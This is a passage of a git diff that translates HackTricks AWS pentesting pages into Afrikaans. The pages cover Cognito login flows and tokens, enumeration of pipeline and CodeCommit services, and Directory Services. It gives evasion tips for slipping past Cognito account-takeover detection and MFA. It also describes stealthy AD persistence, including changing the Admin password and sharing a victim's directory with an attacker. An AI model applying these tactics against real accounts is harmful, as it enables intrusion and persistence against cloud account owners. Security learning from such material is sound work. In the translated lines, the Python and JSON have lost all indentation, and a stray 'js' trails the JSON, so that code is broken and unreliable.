+Boonop, wanneer 'n gebruiker in die Poel **3 tipes tokens gegee word**: Die **ID Token**, die **Toegangstoken** en die **Herlaa token**.
 
-A user pool supports **different ways to authenticate** to it. If you have a **username and password** there are also **different methods** supported to login.\
-Moreover, when a user is authenticated in the Pool **3 types of tokens are given**: The **ID Token**, the **Access token** and the **Refresh token**.
-
-- [**ID Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-id-token.html): It contains claims about the **identity of the authenticated user,** such as `name`, `email`, and `phone_number`. The ID token can also be used to **authenticate users to your resource servers or server applications**. You must **verify** the **signature** of the ID token before you can trust any claims inside the ID token if you use it in external applications.
-  - The ID Token is the token that **contains the attributes values of the user**, even the custom ones.
-- [**Access Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-access-token.html): It contains claims about the authenticated user, a list of the **user's groups, and a list of scopes**. The purpose of the access token is to **authorize API operations** in the context of the user in the user pool. For example, you can use the access token to **grant your user access** to add, change, or delete user attributes.
-- [**Refresh Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-refresh-token.html): With refresh tokens you can **get new ID Tokens and Access Tokens** for the user until the **refresh token is invalid**. By **default**, the refresh token **expires 30 days after** your application user signs into your user pool. When you create an application for your user pool, you can set the application's refresh token expiration to **any value between 60 minutes and 10 years**.
+- [**ID Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-id-token.html): Dit bevat aansprake oor die **identiteit van die geverifieerde gebruiker**, soos `name`, `email`, en `phone_number`. Die ID token kan ook gebruik word om **gebruikers te autentiseer op jou hulpbronne bedieners of bediener toepassings**. Jy moet die **handtekening** van die ID token **verifieer** voordat jy enige aansprake binne die ID token kan vertrou as jy dit in eksterne toepassings gebruik.
+- Die ID Token is die token wat **die attribuutwaardes van die gebruiker bevat**, selfs die pasgemaakte.
+- [**Toegangstoken**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-access-token.html): Dit bevat aansprake oor die geverifieerde gebruiker, 'n lys van die **gebruiker se groepe, en 'n lys van skope**. Die doel van die toegangstoken is om **API operasies te autoriseer** in die konteks van die gebruiker in die gebruikerspoel. Byvoorbeeld, jy kan die toegangstoken gebruik om **jou gebruiker toegang te gee** om gebruikersattribuut te voeg, te verander of te verwyder.
+- [**Herlaa token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-refresh-token.html): Met herlaa tokens kan jy **nuwe ID Tokens en Toegangstokens kry** vir die gebruiker totdat die **herlaa token ongeldig is**. Deur **standaard** verval die herlaa token **30 dae nadat** jou toepassingsgebruiker in jou gebruikerspoel aanmeld. Wanneer jy 'n toepassing vir jou gebruikerspoel skep, kan jy die herlaa token vervaldatum van die toepassing stel op **enige waarde tussen 60 minute en 10 jaar**.
 
 ### ADMIN_NO_SRP_AUTH & ADMIN_USER_PASSWORD_AUTH
 
-This is the server side authentication flow:
+Dit is die bediener kant autentisering vloei:
 
-- The server-side app calls the **`AdminInitiateAuth` API operation** (instead of `InitiateAuth`). This operation requires AWS credentials with permissions that include **`cognito-idp:AdminInitiateAuth`** and **`cognito-idp:AdminRespondToAuthChallenge`**. The operation returns the required authentication parameters.
-- After the server-side app has the **authentication parameters**, it calls the **`AdminRespondToAuthChallenge` API operation**. The `AdminRespondToAuthChallenge` API operation only succeeds when you provide AWS credentials.
+- Die bediener-kant toepassing roep die **`AdminInitiateAuth` API operasie** aan (in plaas van `InitiateAuth`). Hierdie operasie vereis AWS geloofsbriewe met toestemmings wat **`cognito-idp:AdminInitiateAuth`** en **`cognito-idp:AdminRespondToAuthChallenge`** insluit. Die operasie gee die vereiste autentisering parameters terug.
+- Nadat die bediener-kant toepassing die **autentisering parameters** het, roep dit die **`AdminRespondToAuthChallenge` API operasie** aan. Die `AdminRespondToAuthChallenge` API operasie slaag slegs wanneer jy AWS geloofsbriewe verskaf.
 
-This **method is NOT enabled** by default.
+Hierdie **metode is NIE geaktiveer** deur standaard nie.
 
-To **login** you **need** to know:
+Om te **meld aan** moet jy **weet**:
 
-- user pool id
-- client id
-- username
-- password
-- client secret (only if the app is configured to use a secret)
+- gebruikerspoel id
+- kliënt id
+- gebruikersnaam
+- wagwoord
+- kliënt geheim (slegs as die toepassing geconfigureer is om 'n geheim te gebruik)
 
 > [!NOTE]
-> In order to be **able to login with this method** that application must allow to login with `ALLOW_ADMIN_USER_PASSWORD_AUTH`.\
-> Moreover, to perform this action you need credentials with the permissions **`cognito-idp:AdminInitiateAuth`** and **`cognito-idp:AdminRespondToAuthChallenge`**
-
+> Ten einde **in staat te wees om met hierdie metode aan te meld** moet daardie toepassing toelaat om aan te meld met `ALLOW_ADMIN_USER_PASSWORD_AUTH`.\
+> Boonop, om hierdie aksie uit te voer, het jy geloofsbriewe met die toestemmings **`cognito-idp:AdminInitiateAuth`** en **`cognito-idp:AdminRespondToAuthChallenge`** nodig.
 ```python
 aws cognito-idp admin-initiate-auth \
-    --client-id <client-id> \
-    --auth-flow ADMIN_USER_PASSWORD_AUTH \
-    --region <region> \
-    --auth-parameters 'USERNAME=<username>,PASSWORD=<password>,SECRET_HASH=<hash_if_needed>'
-    --user-pool-id "<pool-id>"
+--client-id <client-id> \
+--auth-flow ADMIN_USER_PASSWORD_AUTH \
+--region <region> \
+--auth-parameters 'USERNAME=<username>,PASSWORD=<password>,SECRET_HASH=<hash_if_needed>'
+--user-pool-id "<pool-id>"
 
 # Check the python code to learn how to generate the hsecret_hash
 ```
-
 <details>
 
-<summary>Code to Login</summary>
-
+<summary>Kode om in te log</summary>
 ```python
 import boto3
 import botocore
@@ -249,61 +216,57 @@ password = "<pwd>"
 boto_client = boto3.client('cognito-idp', region_name='us-east-1')
 
 def get_secret_hash(username, client_id, client_secret):
-    key = bytes(client_secret, 'utf-8')
-    message = bytes(f'{username}{client_id}', 'utf-8')
-    return base64.b64encode(hmac.new(key, message, digestmod=hashlib.sha256).digest()).decode()
+key = bytes(client_secret, 'utf-8')
+message = bytes(f'{username}{client_id}', 'utf-8')
+return base64.b64encode(hmac.new(key, message, digestmod=hashlib.sha256).digest()).decode()
 
 # If the Client App isn't configured to use a secret
 ## just delete the line setting the SECRET_HASH
 def login_user(username_or_alias, password, client_id, client_secret, user_pool_id):
-    try:
-        return boto_client.admin_initiate_auth(
-            UserPoolId=user_pool_id,
-            ClientId=client_id,
-            AuthFlow='ADMIN_USER_PASSWORD_AUTH',
-            AuthParameters={
-                'USERNAME': username_or_alias,
-                'PASSWORD': password,
-                'SECRET_HASH': get_secret_hash(username_or_alias, client_id, client_secret)
-            }
-        )
-    except botocore.exceptions.ClientError as e:
-        return e.response
+try:
+return boto_client.admin_initiate_auth(
+UserPoolId=user_pool_id,
+ClientId=client_id,
+AuthFlow='ADMIN_USER_PASSWORD_AUTH',
+AuthParameters={
+'USERNAME': username_or_alias,
+'PASSWORD': password,
+'SECRET_HASH': get_secret_hash(username_or_alias, client_id, client_secret)
+}
+)
+except botocore.exceptions.ClientError as e:
+return e.response
 
 print(login_user(username, password, client_id, client_secret, user_pool_id))
 ```
-
 </details>
 
 ### USER_PASSWORD_AUTH
 
-This method is another simple and **traditional user & password authentication** flow. It's recommended to **migrate a traditional** authentication method **to Cognito** and **recommended** to then **disable** it and **use** then **ALLOW_USER_SRP_AUTH** method instead (as that one never sends the password over the network).\
-This **method is NOT enabled** by default.
+Hierdie metode is 'n ander eenvoudige en **tradisionele gebruiker & wagwoord outentikasie** vloei. Dit word aanbeveel om **'n tradisionele** outentikasie metode **na Cognito** te **migreer** en **aanbeveel** om dit dan **te deaktiveer** en **in plaas daarvan** die **ALLOW_USER_SRP_AUTH** metode te **gebruik** (aangesien dit nooit die wagwoord oor die netwerk stuur).\
+Hierdie **metode is NIE geaktiveer** nie as standaard.
 
-The main **difference** with the **previous auth method** inside the code is that you **don't need to know the user pool ID** and that you **don't need extra permissions** in the Cognito User Pool.
+Die hoof **verskil** met die **vorige outentikasie metode** binne die kode is dat jy **nie die gebruiker poel ID** hoef te weet nie en dat jy **nie ekstra toestemmings** in die Cognito Gebruiker Poel nodig het nie.
 
-To **login** you **need** to know:
+Om te **log in** moet jy **weet**:
 
-- client id
-- username
-- password
-- client secret (only if the app is configured to use a secret)
+- kliënt id
+- gebruikersnaam
+- wagwoord
+- kliënt geheim (slegs as die toepassing gekonfigureer is om 'n geheim te gebruik)
 
 > [!NOTE]
-> In order to be **able to login with this method** that application must allow to login with ALLOW_USER_PASSWORD_AUTH.
-
+> Ten einde **in staat te wees om met hierdie metode in te log** moet daardie toepassing toelaat om in te log met ALLOW_USER_PASSWORD_AUTH.
 ```python
 aws cognito-idp initiate-auth  --client-id <client-id> \
-    --auth-flow USER_PASSWORD_AUTH --region <region> \
-    --auth-parameters 'USERNAME=<username>,PASSWORD=<password>,SECRET_HASH=<hash_if_needed>'
+--auth-flow USER_PASSWORD_AUTH --region <region> \
+--auth-parameters 'USERNAME=<username>,PASSWORD=<password>,SECRET_HASH=<hash_if_needed>'
 
 # Check the python code to learn how to generate the secret_hash
 ```
-
 <details>
 
-<summary>Python code to Login</summary>
-
+<summary>Python kode om aan te meld</summary>
 ```python
 import boto3
 import botocore
@@ -321,48 +284,46 @@ password = "<pwd>"
 boto_client = boto3.client('cognito-idp', region_name='us-east-1')
 
 def get_secret_hash(username, client_id, client_secret):
-    key = bytes(client_secret, 'utf-8')
-    message = bytes(f'{username}{client_id}', 'utf-8')
-    return base64.b64encode(hmac.new(key, message, digestmod=hashlib.sha256).digest()).decode()
+key = bytes(client_secret, 'utf-8')
+message = bytes(f'{username}{client_id}', 'utf-8')
+return base64.b64encode(hmac.new(key, message, digestmod=hashlib.sha256).digest()).decode()
 
 # If the Client App isn't configured to use a secret
 ## just delete the line setting the SECRET_HASH
 def login_user(username_or_alias, password, client_id, client_secret, user_pool_id):
-    try:
-        return boto_client.initiate_auth(
-            ClientId=client_id,
-            AuthFlow='ADMIN_USER_PASSWORD_AUTH',
-            AuthParameters={
-                'USERNAME': username_or_alias,
-                'PASSWORD': password,
-                'SECRET_HASH': get_secret_hash(username_or_alias, client_id, client_secret)
-            }
-        )
-    except botocore.exceptions.ClientError as e:
-        return e.response
+try:
+return boto_client.initiate_auth(
+ClientId=client_id,
+AuthFlow='ADMIN_USER_PASSWORD_AUTH',
+AuthParameters={
+'USERNAME': username_or_alias,
+'PASSWORD': password,
+'SECRET_HASH': get_secret_hash(username_or_alias, client_id, client_secret)
+}
+)
+except botocore.exceptions.ClientError as e:
+return e.response
 
 print(login_user(username, password, client_id, client_secret, user_pool_id))
 ```
-
 </details>
 
 ### USER_SRP_AUTH
 
-This is scenario is similar to the previous one but **instead of of sending the password** through the network to login a **challenge authentication is performed** (so no password navigating even encrypted through he net).\
-This **method is enabled** by default.
+Hierdie scenario is soortgelyk aan die vorige een, maar **in plaas daarvan om die wagwoord** deur die netwerk te stuur om aan te meld, word 'n **uitdaging-authentisering uitgevoer** (so geen wagwoord wat selfs versleuteld deur die netwerk beweeg nie).\
+Hierdie **metode is standaard geaktiveer**.
 
-To **login** you **need** to know:
+Om te **meld aan** moet jy weet:
 
-- user pool id
-- client id
-- username
-- password
-- client secret (only if the app is configured to use a secret)
+- gebruikerspoel id
+- kliënt id
+- gebruikersnaam
+- wagwoord
+- kliënt geheim (slegs as die toepassing gekonfigureer is om 'n geheim te gebruik)
 
 <details>
 
-<summary>Code to login</summary>
-
+<summary>Code om aan te meld</summary>
 ```python
 from warrant.aws_srp import AWSSRP
 import os
@@ -375,32 +336,28 @@ CLIENT_SECRET = 'secreeeeet'
 os.environ["AWS_DEFAULT_REGION"] = "<region>"
 
 aws = AWSSRP(username=USERNAME, password=PASSWORD, pool_id=POOL_ID,
-    client_id=CLIENT_ID, client_secret=CLIENT_SECRET)
+client_id=CLIENT_ID, client_secret=CLIENT_SECRET)
 tokens = aws.authenticate_user()
 id_token = tokens['AuthenticationResult']['IdToken']
 refresh_token = tokens['AuthenticationResult']['RefreshToken']
 access_token = tokens['AuthenticationResult']['AccessToken']
 token_type = tokens['AuthenticationResult']['TokenType']
 ```
-
 </details>
 
 ### REFRESH_TOKEN_AUTH & REFRESH_TOKEN
 
-This **method is always going to be valid** (it cannot be disabled) but you need to have a valid refresh token.
-
+Hierdie **metode gaan altyd geldig wees** (dit kan nie gedeaktiveer word nie) maar jy moet 'n geldige herlaai-token hê.
 ```bash
 aws cognito-idp initiate-auth \
-    --client-id 3ig6h5gjm56p1ljls1prq2miut \
-    --auth-flow REFRESH_TOKEN_AUTH \
-    --region us-east-1 \
-    --auth-parameters 'REFRESH_TOKEN=<token>'
+--client-id 3ig6h5gjm56p1ljls1prq2miut \
+--auth-flow REFRESH_TOKEN_AUTH \
+--region us-east-1 \
+--auth-parameters 'REFRESH_TOKEN=<token>'
 ```
-
 <details>
 
-<summary>Code to refresh</summary>
-
+<summary>Kode om te verfris</summary>
 ```python
 import boto3
 import botocore
@@ -414,83 +371,74 @@ token = '<token>'
 boto_client = boto3.client('cognito-idp', region_name='<region>')
 
 def refresh(client_id, refresh_token):
-    try:
-        return boto_client.initiate_auth(
-            ClientId=client_id,
-            AuthFlow='REFRESH_TOKEN_AUTH',
-            AuthParameters={
-                'REFRESH_TOKEN': refresh_token
-            }
-        )
-    except botocore.exceptions.ClientError as e:
-        return e.response
+try:
+return boto_client.initiate_auth(
+ClientId=client_id,
+AuthFlow='REFRESH_TOKEN_AUTH',
+AuthParameters={
+'REFRESH_TOKEN': refresh_token
+}
+)
+except botocore.exceptions.ClientError as e:
+return e.response
 
 
 print(refresh(client_id, token))
 ```
-
 </details>
 
 ### CUSTOM_AUTH
 
-In this case the **authentication** is going to be performed through the **execution of a lambda function**.
+In hierdie geval gaan die **verifikasie** deur die **uitvoering van 'n lambda-funksie** plaasvind.
 
-## Extra Security
+## Ekstra Sekuriteit
 
-### Advanced Security
+### Gevorderde Sekuriteit
 
-By default it's disabled, but if enabled, Cognito could be able to **find account takeovers**. To minimise the probability you should login from a **network inside the same city, using the same user agent** (and IP is thats possible)**.**
+Standaard is dit gedeaktiveer, maar as dit geaktiveer is, kan Cognito in staat wees om **rekening oorname** te **vind**. Om die waarskynlikheid te minimaliseer, moet jy aanmeld vanaf 'n **netwerk binne dieselfde stad, met dieselfde gebruikersagent** (en IP as dit moontlik is)**.**
 
-### **MFA Remember device**
+### **MFA Onthou toestel**
 
-If the user logins from the same device, the MFA might be bypassed, therefore try to login from the same browser with the same metadata (IP?) to try to bypass the MFA protection.
+As die gebruiker vanaf dieselfde toestel aanmeld, kan die MFA omseil word, probeer dus om vanaf dieselfde blaaiers met dieselfde metadata (IP?) aan te meld om die MFA-beskerming te probeer omseil.
 
-## User Pool Groups IAM Roles
+## Gebruiker Pool Groepe IAM Rolle
 
-It's possible to add **users to User Pool** groups that are related to one **IAM roles**.\
-Moreover, **users** can be assigned to **more than 1 group with different IAM roles** attached.
+Dit is moontlik om **gebruikers aan Gebruiker Pool** groepe toe te voeg wat verband hou met een **IAM rol**.\
+Boonop kan **gebruikers** aan **meer as 1 groep met verskillende IAM rolle** toegeken word.
 
-Note that even if a group is inside a group with an IAM role attached, in order to be able to access IAM credentials of that group it's needed that the **User Pool is trusted by an Identity Pool** (and know the details of that Identity Pool).
+Let daarop dat selfs al is 'n groep binne 'n groep met 'n IAM rol aangeheg, om toegang te verkry tot die IAM geloofsbriewe van daardie groep, is dit nodig dat die **Gebruiker Pool vertrou word deur 'n Identiteits Pool** (en die besonderhede van daardie Identiteits Pool ken).
 
-Another requisite to get the **IAM role indicated in the IdToken** when a user is authenticated in the User Pool (`aws cognito-idp initiate-auth...`) is that the **Identity Provider Authentication provider** needs indicate that the **role must be selected from the token.**
+Nog 'n vereiste om die **IAM rol aangedui in die IdToken** te verkry wanneer 'n gebruiker in die Gebruiker Pool geverifieer word (`aws cognito-idp initiate-auth...`), is dat die **Identiteits Verskaffer Verifikasie verskaffer** moet aandui dat die **rol uit die token gekies moet word.**
 
 <figure><img src="../../../../images/image (250).png" alt=""><figcaption></figcaption></figure>
 
-The **roles** a user have access to are **inside the `IdToken`**, and a user can **select which role he would like credentials for** with the **`--custom-role-arn`** from `aws cognito-identity get-credentials-for-identity`.\
-However, if the **default option** is the one **configured** (`use default role`), and you try to access a role from the IdToken, you will get **error** (that's why the previous configuration is needed):
-
+Die **rolle** waartoe 'n gebruiker toegang het, is **binne die `IdToken`**, en 'n gebruiker kan **kies watter rol hy graag geloofsbriewe vir** wil hê met die **`--custom-role-arn`** van `aws cognito-identity get-credentials-for-identity`.\
+As die **standaard opsie** egter die een is wat **gekonfigureer** is (`use default role`), en jy probeer om toegang te verkry tot 'n rol vanaf die IdToken, sal jy **fout** kry (dit is waarom die vorige konfigurasie nodig is):
 ```
 An error occurred (InvalidParameterException) when calling the GetCredentialsForIdentity operation: Only SAML providers and providers with RoleMappings support custom role ARN.
 ```
-
 > [!WARNING]
-> Note that the role assigned to a **User Pool Group** needs to be **accesible by the Identity Provider** that **trust the User Pool** (as the IAM role **session credentials are going to be obtained from it**).
-
+> Let daarop dat die rol wat aan 'n **User Pool Group** toegeken is, **toeganklik moet wees deur die Identiteitsverskaffer** wat **die User Pool vertrou** (aangesien die IAM-rol **sessie-inligting daaruit verkry gaan word**).
 ```json
 {
-    "Version": "2012-10-17",
-    "Statement": [
-        {
-            "Effect": "Allow",
-            "Principal": {
-                "Federated": "cognito-identity.amazonaws.com"
-            },
-            "Action": "sts:AssumeRoleWithWebIdentity",
-            "Condition": {
-                "StringEquals": {
-                    "cognito-identity.amazonaws.com:aud": "us-east-1:2361092e-9db6-a876-1027-10387c9de439"
-                },
-                "ForAnyValue:StringLike": {
-                    "cognito-identity.amazonaws.com:amr": "authenticated"
-                }
-            }
-        }
-    ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"Federated": "cognito-identity.amazonaws.com"
+},
+"Action": "sts:AssumeRoleWithWebIdentity",
+"Condition": {
+"StringEquals": {
+"cognito-identity.amazonaws.com:aud": "us-east-1:2361092e-9db6-a876-1027-10387c9de439"
+},
+"ForAnyValue:StringLike": {
+"cognito-identity.amazonaws.com:amr": "authenticated"
+}
+}
+}
+]
 }js
 ```
-
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md b/src/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md
index 2a907b71b..059899a28 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md
@@ -4,30 +4,28 @@
 
 ## DataPipeline
 
-AWS Data Pipeline is designed to facilitate the **access, transformation, and efficient transfer** of data at scale. It allows the following operations to be performed:
+AWS Data Pipeline is ontwerp om die **toegang, transformasie, en doeltreffende oordrag** van data op skaal te fasiliteer. Dit laat die volgende operasies toe:
 
-1. **Access Your Data Where It’s Stored**: Data residing in various AWS services can be accessed seamlessly.
-2. **Transform and Process at Scale**: Large-scale data processing and transformation tasks are handled efficiently.
-3. **Efficiently Transfer Results**: The processed data can be efficiently transferred to multiple AWS services including:
-   - Amazon S3
-   - Amazon RDS
-   - Amazon DynamoDB
-   - Amazon EMR
+1. **Toegang tot Jou Data Waar Dit Gestoor Is**: Data wat in verskeie AWS-dienste woon, kan naatloos verkry word.
+2. **Transformeer en Verwerk op Skaal**: Grootmaat data verwerking en transformasie take word doeltreffend hanteer.
+3. **Doeltreffend Oordrag van Resultate**: Die verwerkte data kan doeltreffend oorgedra word na verskeie AWS-dienste insluitend:
+- Amazon S3
+- Amazon RDS
+- Amazon DynamoDB
+- Amazon EMR
 
-In essence, AWS Data Pipeline streamlines the movement and processing of data between different AWS compute and storage services, as well as on-premises data sources, at specified intervals.
+In wese stroomlyn AWS Data Pipeline die beweging en verwerking van data tussen verskillende AWS reken- en stoor dienste, sowel as op-premises data bronne, op gespesifiseerde tydperke.
 
 ### Enumeration
-
 ```bash
 aws datapipeline list-pipelines
 aws datapipeline describe-pipelines --pipeline-ids <ID>
 aws datapipeline list-runs --pipeline-id <ID>
 aws datapipeline get-pipeline-definition --pipeline-id <ID>
 ```
-
 ### Privesc
 
-In the following page you can check how to **abuse datapipeline permissions to escalate privileges**:
+In die volgende bladsy kan jy kyk hoe om **datapipeline-toestemmings te misbruik om voorregte te verhoog**:
 
 {{#ref}}
 ../aws-privilege-escalation/aws-datapipeline-privesc.md
@@ -35,10 +33,9 @@ In the following page you can check how to **abuse datapipeline permissions to e
 
 ## CodePipeline
 
-AWS CodePipeline is a fully managed **continuous delivery service** that helps you **automate your release pipelines** for fast and reliable application and infrastructure updates. CodePipeline automates the **build, test, and deploy phases** of your release process every time there is a code change, based on the release model you define.
+AWS CodePipeline is 'n volledig bestuurde **deurlopende afleweringsdiens** wat jou help om **jou vrystellingspype te outomatiseer** vir vinnige en betroubare toepassings- en infrastruktuuropdaterings. CodePipeline outomatiseer die **bou, toets, en ontplooi fases** van jou vrystellingsproses elke keer daar 'n kodeverandering is, gebaseer op die vrystellingsmodel wat jy definieer.
 
 ### Enumeration
-
 ```bash
 aws codepipeline list-pipelines
 aws codepipeline get-pipeline --name <pipeline_name>
@@ -47,10 +44,9 @@ aws codepipeline list-pipeline-executions --pipeline-name <pl_name>
 aws codepipeline list-webhooks
 aws codepipeline get-pipeline-state --name <pipeline_name>
 ```
-
 ### Privesc
 
-In the following page you can check how to **abuse codepipeline permissions to escalate privileges**:
+In die volgende bladsy kan jy kyk hoe om **kodepypel-regte te misbruik om voorregte te verhoog**:
 
 {{#ref}}
 ../aws-privilege-escalation/aws-codepipeline-privesc.md
@@ -58,12 +54,11 @@ In the following page you can check how to **abuse codepipeline permissions to e
 
 ## CodeCommit
 
-It is a **version control service**, which is hosted and fully managed by Amazon, which can be used to privately store data (documents, binary files, source code) and manage them in the cloud.
+Dit is 'n **weergawebeheerdiens**, wat gehos en ten volle bestuur word deur Amazon, wat gebruik kan word om data (dokumente, binêre lêers, bronkode) privaat te stoor en dit in die wolk te bestuur.
 
-It **eliminates** the requirement for the user to know Git and **manage their own source control system** or worry about scaling up or down their infrastructure. Codecommit supports all the standard **functionalities that can be found in Git**, which means it works effortlessly with user’s current Git-based tools.
+Dit **verwyder** die vereiste dat die gebruiker Git moet ken en **hulle eie bronbeheerstelsel moet bestuur** of bekommerd wees oor die skaal van hul infrastruktuur. Codecommit ondersteun al die standaard **funksies wat in Git gevind kan word**, wat beteken dit werk moeiteloos saam met die gebruiker se huidige Git-gebaseerde gereedskap.
 
 ### Enumeration
-
 ```bash
 # Repos
 aws codecommit list-repositories
@@ -95,13 +90,8 @@ ssh-keygen -f .ssh/id_rsa -l -E md5
 # Clone repo
 git clone ssh://<SSH-KEY-ID>@git-codecommit.<REGION>.amazonaws.com/v1/repos/<repo-name>
 ```
-
-## References
+## Verwysings
 
 - [https://docs.aws.amazon.com/whitepapers/latest/aws-overview/analytics.html](https://docs.aws.amazon.com/whitepapers/latest/aws-overview/analytics.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md
index 93992174c..46db343d9 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md
@@ -4,26 +4,25 @@
 
 ## Directory Services
 
-AWS Directory Service for Microsoft Active Directory is a managed service that makes it easy to **set up, operate, and scale a directory** in the AWS Cloud. It is built on actual **Microsoft Active Directory** and integrates tightly with other AWS services, making it easy to manage your directory-aware workloads and AWS resources. With AWS Managed Microsoft AD, you can **use your existing** Active Directory users, groups, and policies to manage access to your AWS resources. This can help simplify your identity management and reduce the need for additional identity solutions. AWS Managed Microsoft AD also provides automatic backups and disaster recovery capabilities, helping to ensure the availability and durability of your directory. Overall, AWS Directory Service for Microsoft Active Directory can help you save time and resources by providing a managed, highly available, and scalable Active Directory service in the AWS Cloud.
+AWS Directory Service for Microsoft Active Directory is 'n bestuurde diens wat dit maklik maak om 'n **directory op te stel, te bedryf en te skaal** in die AWS Cloud. Dit is gebou op werklike **Microsoft Active Directory** en integreer noukeurig met ander AWS-dienste, wat dit maklik maak om jou directory-bewuste werklading en AWS-hulpbronne te bestuur. Met AWS Managed Microsoft AD kan jy **jou bestaande** Active Directory gebruikers, groepe en beleide gebruik om toegang tot jou AWS-hulpbronne te bestuur. Dit kan help om jou identiteitsbestuur te vereenvoudig en die behoefte aan addisionele identiteitsoplossings te verminder. AWS Managed Microsoft AD bied ook outomatiese rugsteun en rampherstelvermoëns, wat help om die beskikbaarheid en duursaamheid van jou directory te verseker. Oor die algemeen kan AWS Directory Service for Microsoft Active Directory jou help om tyd en hulpbronne te bespaar deur 'n bestuurde, hoogs beskikbare en skaalbare Active Directory-diens in die AWS Cloud te bied.
 
 ### Options
 
-Directory Services allows to create 5 types of directories:
+Directory Services laat jou toe om 5 tipes directories te skep:
 
-- **AWS Managed Microsoft AD**: Which will run a new **Microsoft AD in AWS**. You will be able to set the admin password and access the DCs in a VPC.
-- **Simple AD**: Which will be a **Linux-Samba** Active Directory–compatible server. You will be able to set the admin password and access the DCs in a VPC.
-- **AD Connector**: A proxy for **redirecting directory requests to your existing Microsoft Active Directory** without caching any information in the cloud. It will be listening in a **VPC** and you need to give **credentials to access the existing AD**.
-- **Amazon Cognito User Pools**: This is the same as Cognito User Pools.
-- **Cloud Directory**: This is the **simplest** one. A **serverless** directory where you indicate the **schema** to use and are **billed according to the usage**.
+- **AWS Managed Microsoft AD**: Wat 'n nuwe **Microsoft AD in AWS** sal laat loop. Jy sal in staat wees om die admin wagwoord in te stel en toegang tot die DC's in 'n VPC te verkry.
+- **Simple AD**: Wat 'n **Linux-Samba** Active Directory–kompatible bediener sal wees. Jy sal in staat wees om die admin wagwoord in te stel en toegang tot die DC's in 'n VPC te verkry.
+- **AD Connector**: 'n proxy vir **om directory versoeke na jou bestaande Microsoft Active Directory te herlei** sonder om enige inligting in die wolk te kas. Dit sal in 'n **VPC** luister en jy moet **akkrediteer om toegang tot die bestaande AD te verkry**.
+- **Amazon Cognito User Pools**: Dit is dieselfde as Cognito User Pools.
+- **Cloud Directory**: Dit is die **simpele** een. 'n **serverless** directory waar jy die **schema** aandui om te gebruik en jy word **gefactureer volgens die gebruik**.
 
-AWS Directory services allows to **synchronise** with your existing **on-premises** Microsoft AD, **run your own one** in AWS or synchronize with **other directory types**.
+AWS Directory services laat jou toe om te **synchroniseer** met jou bestaande **on-premises** Microsoft AD, **jou eie een** in AWS te laat loop of te synchroniseer met **ander directory tipes**.
 
 ### Lab
 
-Here you can find a nice tutorial to create you own Microsoft AD in AWS: [https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html)
+Hier kan jy 'n lekker tutoriaal vind om jou eie Microsoft AD in AWS te skep: [https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html)
 
 ### Enumeration
-
 ```bash
 # Get directories and DCs
 aws ds describe-directories
@@ -36,10 +35,9 @@ aws ds get-directory-limits
 aws ds list-certificates --directory-id <id>
 aws ds describe-certificate --directory-id <id> --certificate-id <id>
 ```
-
 ### Login
 
-Note that if the **description** of the directory contained a **domain** in the field **`AccessUrl`** it's because a **user** can probably **login** with its **AD credentials** in some **AWS services:**
+Let daarop dat as die **beskrywing** van die gids 'n **domein** in die veld **`AccessUrl`** bevat, dit is omdat 'n **gebruiker** waarskynlik kan **aanmeld** met sy **AD-akkrediteer** in sommige **AWS-dienste:**
 
 - `<name>.awsapps.com/connect` (Amazon Connect)
 - `<name>.awsapps.com/workdocs` (Amazon WorkDocs)
@@ -57,30 +55,29 @@ Note that if the **description** of the directory contained a **domain** in the
 
 ### Using an AD user
 
-An **AD user** can be given **access over the AWS management console** via a Role to assume. The **default username is Admin** and it's possible to **change its password** from AWS console.
+'n **AD-gebruiker** kan **toegang oor die AWS-bestuurskonsol** gegee word via 'n Rol om aan te neem. Die **standaard gebruikersnaam is Admin** en dit is moontlik om **sy wagwoord te verander** vanaf die AWS-konsol.
 
-Therefore, it's possible to **change the password of Admin**, **create a new user** or **change the password** of a user and grant that user a Role to maintain access.\
-It's also possible to **add a user to a group inside AD** and **give that AD group access to a Role** (to make this persistence more stealth).
+Daarom is dit moontlik om **die wagwoord van Admin te verander**, **'n nuwe gebruiker te skep** of **die wagwoord** van 'n gebruiker te verander en daardie gebruiker 'n Rol te gee om toegang te behou.\
+Dit is ook moontlik om **'n gebruiker aan 'n groep binne AD toe te voeg** en **daardie AD-groep toegang tot 'n Rol te gee** (om hierdie volharding meer stil te maak).
 
 ### Sharing AD (from victim to attacker)
 
-It's possible to share an AD environment from a victim to an attacker. This way the attacker will be able to continue accessing the AD env.\
-However, this implies sharing the managed AD and also creating an VPC peering connection.
+Dit is moontlik om 'n AD-omgewing van 'n slagoffer na 'n aanvaller te deel. Op hierdie manier sal die aanvaller in staat wees om voort te gaan om toegang tot die AD-omgewing te verkry.\
+Dit impliseer egter die deel van die bestuurde AD en ook die skep van 'n VPC-peeringverbinding.
 
